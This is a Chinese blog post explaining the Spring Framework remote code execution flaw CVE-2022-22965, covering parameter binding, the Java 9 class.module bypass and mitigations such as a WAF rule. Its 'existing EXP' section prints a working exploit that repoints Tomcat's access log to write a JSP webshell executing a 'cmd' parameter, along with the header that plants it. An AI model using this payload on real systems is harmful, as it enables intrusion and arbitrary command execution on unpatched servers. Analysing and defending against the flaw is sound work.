Spring_Rce分析

最新推荐文章于 2023-07-04 19:00:00 发布
最新推荐文章于 2023-07-04 19:00:00 发布
阅读量562 收藏
点赞数
分类专栏: 渗透测试 实战集 文章标签: Spring Rce java9
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42383069/article/details/123899278
版权

Spring_Rce分析

1. ClassLoader
就是类加载器,ClassLoader的具体作用就是将class文件加载到jvm虚拟机中去,程序便可以运行

2. 漏洞利用的条件

Web 应用程序是基于 Spring Framework 构建的(例如 Spring Boot)
Web 应用程序在 JDK 9 或任何更高版本
Web 应用程序使用数据绑定将请求参数绑定到 Java 对象

3. 漏洞利用的两个阶段

2.1 覆盖 Tomcat 特定的ClassLoader属性,将访问日志文件路径更改为 web 根目录下的某个位置,并将日志模式(写入的数据)更改为包含 webshel​​l 代码的常量模式。这会导致 JSP_webshel​​l被放到web 根目录下
2.2 向写入的 webshel​​l 发送查询请求,以执行任意 shell 命令

4.参数绑定

将URL中的的请求参数,进行类型转换(String或其他类型),将转换后的值在赋值给Controller方法形参中,然后Controller就可以直接使用该形参

4.2 参数绑定简介

这种机制从请求 URL 或请求正文中获取参数,并将它们分配给函数参数,或者在某些情况下分配给Java 对象

示例代码:

public class Greeting {
    private long id;
    private String content;

@GetMapping("/endpoint")
public String greetingSubmit(@ModelAttribute Greeting greeting, Model model) {

请求url: http://www.myapp.com/endpoint?id=5&content=hello
最终结果:

greeting.getId() == 5
greeting.getContent() == "hello"

4.3 潜在的危险
将请求参数分配给 Java 对象时,存在一定的安全风险,因为构建对象的某些"内部"参数在外部可以控制,这包括Class、ClassLoader和ProtectionDomain参数

4.4 Java9新特性
从 Java 9 开始,由于引入了新的 API ( class.getModule ),可以绕过 Spring 的保护并直接为ClassLoader的属性分配任意值

5. 漏洞产生的关键点

数据绑定将请求参数绑定到 Java 对象
由于漏洞存在于 Spring 的数据绑定机制中,因此只有尝试将请求参数绑定到 POJO(Plain Old Java Objects)的 Web 应用程序易受攻击

以下任何装饰器都表示可能容易受到影响的请求处理程序

@RequestMapping
@GetMapping
@PostMapping
@PutMapping
@DeleteMapping
@PatchMapping

代码示例:

@Controller
public class HelloController {
  @GetMapping("/greeting")
  public String helloWorld(@ModelAttribute SomeClass someClass, Model model) {
      return "hello";
  }
}

6. 现有EXP

class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{c2}i if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in = %{c1}i.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } %{suffix}i
&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp
&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT
&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell
&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=

6.1 EXP分析:

以上属性控制tomcat服务生成的log属性,比如内容后缀等
设置以下属性后,从此开始tomcat的log将被记录入 webapps/ROOT/shell.jsp中

class.classLoader.resources.context.parent.pipeline.first.fileDateFormat =

接着我们只需要随便发送⼀个请求,加⼀个叫c2(上面pattern设置的属性)的header,即可写⼊shell

c2: <%Runtime.getRuntime().exec(request.getParameter("cmd"))%>

7. 目前措施
7.1 自查版本
(1)JDK版本号在9及以上
(2)使用了spring框架或衍生框架
7.2 WAF防护:
添加规则匹配 {“class.","Class. “,”. class.”, “.Class.”}

Beyond My
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Spring Rce 漏洞分析CVE-2022-22965
embelfe_segge的博客
08-02 3832
SpringFramework是一个开源的轻量级J2EE应用程序开发框架。3月31日,VMware发布安全公告,修复了SpringFramework中的远程代码执行漏洞(CVE-2022-22965)。在JDK9及以上版本环境下,可以利用此漏洞在未授权的情况下在目标系统上写入恶意程序从而远程执行任意代码。...
Spring RCE 漏洞
归零安全(transnul)
03-30 444
​本文由Scynull编译,校对,转载请注明。 免责申明 归零安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。 本文所提供的工具仅用于学习,禁止用于其他,请在24小时内删除工具文件!!! JDK版本号排查 1.JDK版本排查 在业务系统的运行服务器上,执行“java -version”命令
Spring RCE漏洞分析1(CVE-2018-1270)
hldfight
05-04 8132
0x00 前言 趁着五一休息,分析了一下Spring的历史漏洞,这里记录一下对Spring-Messaging远程代码执行漏洞(CVE-2018-1270)的分析。该漏洞涉及到如下概念: 1、WebSocket协议,是HTML5提供的一种可在单个TCP连接上进行全双工通讯的协议。即允许服务端主动向客户端推送数据,详情可以参考这里,讲的挺好的。 2、SockJS,一个JavaScript库,它在浏览...
Spring RCE(CVE-2022-22965)漏洞复现POC
午夜安全
04-18 2608
漏洞编号 CVE-2022-22965 影响范围 受影响范围 Spring Framework < 5.3.18 Spring Framework < 5.2.20 及其衍生产品,且JDK>=9。 漏洞描述 Spring framework 是Spring 里面的一个基础开源框架,2022年3月31日,VMware Tanzu发布漏洞报告,Spring Framework存在远程代码执行漏洞,在 JDK 9+ 上运行的 Spring MVC 或 Spring WebFlux
Spring framework deserialization RCE漏洞分析以及利用1
08-08
Spring框架的反序列化RCE漏洞分析与利用 在2021年初,Java反序列化漏洞引起广泛关注,研究人员不断探索其利用技巧。近期,安全研究员zerothoughts在Spring框架中发现了一个与Apache Commons Collection组件无关的...
CVE-2022-22947 SpringCloud GateWay SpEL RCE.doc
07-09
CVE-2022-22947 SpringCloud GateWay SpEL RCE CVE-2022-22947是一种影响SpringCloud GateWay的远程代码执行漏洞,通过SpEL(Spring Expression Language)实现RCE(Remote Code Execution)。下面是关于该漏洞的...
漏洞分析1
08-03
在本文中,我们将深入探讨一个名为"Spring-beans RCE漏洞分析1"的安全问题,它涉及到Spring框架中的远程代码执行(RCE)风险。这个漏洞主要出现在JDK 9及以上版本,并且与Spring-beans包以及Spring参数绑定机制有关...
【技术分享】vCenter Server CVE-2021-21985 RCE分析 .pdf
09-05
【vCenter Server CVE-2021-21985 RCE分析】 vCenter Server是VMware公司的一款核心虚拟化管理平台,用于集中管理企业的私有云环境。2021年,360 Noah Lab的安全研究员Ricter Z发现了针对vCenter Server的重大安全...
SpringCloud Function SpEL注入漏洞分析(CVE-2022-22963).doc
07-08
SpringCloud Function SpEL 注入漏洞分析(CVE-2022-22963) SpringCloud FunctionSpring 提供的一套分布式函数式编程组件,旨在帮助开发者专注于业务逻辑实现,而不需要关心服务器环境运维等问题。然而,在 ...
Spring RCE远程执行漏洞(CVE-2022-22965)
tpaer的博客
10-18 2498
这个洞22年3月底被大佬发现公布,由于Spring框架的影响范围太大了。复现条件又很低,本身就是高危的RCE漏洞可以直接拿到服务器的shell,像作者说的一样确实是一个核弹漏洞。
Spring Framework RCE 漏洞分析 (CVE-2022-22965)
m0_61506558的博客
11-07 1711
该漏洞的本质类似于php的变量覆盖漏洞,exp利用的话,恰好覆盖到tomcat的配置,并修改tomcat的日志位置到根目录,修改日志的后缀为jsp。但是这里叫SpringMVC的参数绑定。 由于笔者个人水平有限,行文如有不当,还请各位师傅评论指正,非常感谢!
spring framework RCE(CVE-2022-22965)
黑白的博客
07-04 3231
细想一下,如果我们通过前面说的种种spring的原理,动态的set这些日志的属性值,那么是不是可以由此生成一个后缀为jsp的马呢?所以我们的目标就成了动态修改tomcat打日志的那几个字段了影响范围1、JDK 9及以上2、直接或间接使用了Spring-bean包(Spring boot等框架都使用了)4、部署方式:使用war包部署于tomcat。
Spring RCE 0day漏洞到底是真是假?
kyzb2022的博客
03-31 5200
哈喽,大家好,我是指北君。 不知道昨晚大家有没有看到Spring框架曝出RCE 0day漏洞,是填上次漏洞的天坑? 还是逃过了上一劫,却遇到了这一劫呢?天道好轮回,苍天饶过谁? 漏洞 在Spring框架的JDK9版本(及以上版本)中,远程攻击者可在满足特定条件的基础上, 通过框架的参数绑定功能获取AccessLogValve对象并注入恶意字段值,从而触发pipeline机制并 写入任意路径下的文件。 指北君在网上给大家找了个有鼻子有眼的文章,阅读量还不少。 指北君今天也尝试去找了相关的发布源头,既没有.
Spring RCE 漏洞 CVE-2022-22965复现分析
m0_61506558的博客
09-19 5497
关于CVE-2022-22965漏洞的环境调试和内容,网上看了一波,感觉有些知识点内容还是必须要了解才能理解该漏洞,为此详细写了下从Spring框架结构分析,环境搭建到漏洞分析调试整体的一个过程理解,在遇到其他类型的漏洞也可以去调试运用。(一)了解Spring框架由于本文主要介绍漏洞原理流程,所以有关框架不会具体展开,会将涉及到的内容进行解释。1、
(2022年12月最新)spring-core-rce漏洞复现CVE-2022-22965
qq1140037586的博客
12-21 1731
2022年3月29日,Spring框架曝出RCE 0day漏洞。已经证实由于 SerializationUtils#deserialize 基于 Java 的序列化机制,可导致远程代码执行 (RCE),使用JDK9及以上版本皆有可能受到影响。通过该漏洞可写入webshell以及命令执行。在Spring框架的JDK9版本(及以上版本)中,远程攻击者可在满足特定条件的基础上,通过框架的参数绑定功能获取AccessLogValve对象并诸如恶意字段值,从而触发pipeline机制并写入任意路径下的文件。
Spring RCE漏洞分析2(CVE-2018-1273)
hldfight
05-07 1926
0x00 前言 继续分析Spring的历史漏洞,本篇记录Spring Data Commons的远程代码执行漏洞(CVE-2018-1273)的分析。 0x01 环境搭建 使用的Spring Data Example Projects提供的示例代码。 但该项目中包含有15个子模块,如果将其整体导入IDEA,则需要下载所有模块中的依赖,显然这是没有必要的。通过参考这篇文章,发现只需导入web模块中的...
Spring-RCE(CVE-2022-22965)的前世今生
include_voidmain的博客
04-08 935
0x01 前言 今天就来说说最近比较火的这个Spring-RCE漏洞,但是今个这文章的标题叫做Spring-RCE的前世今生,那么就得扯扯他的祖宗了CVE-2010-1622,这个2010年就出现的漏洞为啥在2022的今天卷土重来?为啥CVE-2022-22965要在java9+才能实现?在今天这篇文章中就给大家带来答案。 0X02 CVE-2010-1622 这个漏洞出现在2010年可以进行拒绝服务,通用可以进行远程命令执行Spring很早就发布了补丁修复了此漏洞,在此分析为CVE-2022-22965做
复现、修复和排查Spring RCE 0day
记录并分享学习安全的知识点..
03-31 4267
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保。 前言: 3月29日,Spring框架曝出RCE 0day漏洞。已经证实由于 SerializationUtils#deserialize 基于 Java 的序列化机制,可导致远程代码执行 (RCE),使用JDK9及以上版本皆有可能受到影响。 参考:https://new.qq.com/omn/20220330/20220330A08Y9K00.html 漏洞情报 | Spring RCE 0da...
攻防世界php_rce
最新发布
08-26
攻防世界中的php_rce是指一种利用PHP解释器的远程代码执行漏洞进行攻击和防御的技术。这种漏洞可以允许攻击者将恶意的PHP代码注入到服务器上,并执行任意命令。引用中的payload是构造了一个用于执行"ls /flag"命令的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值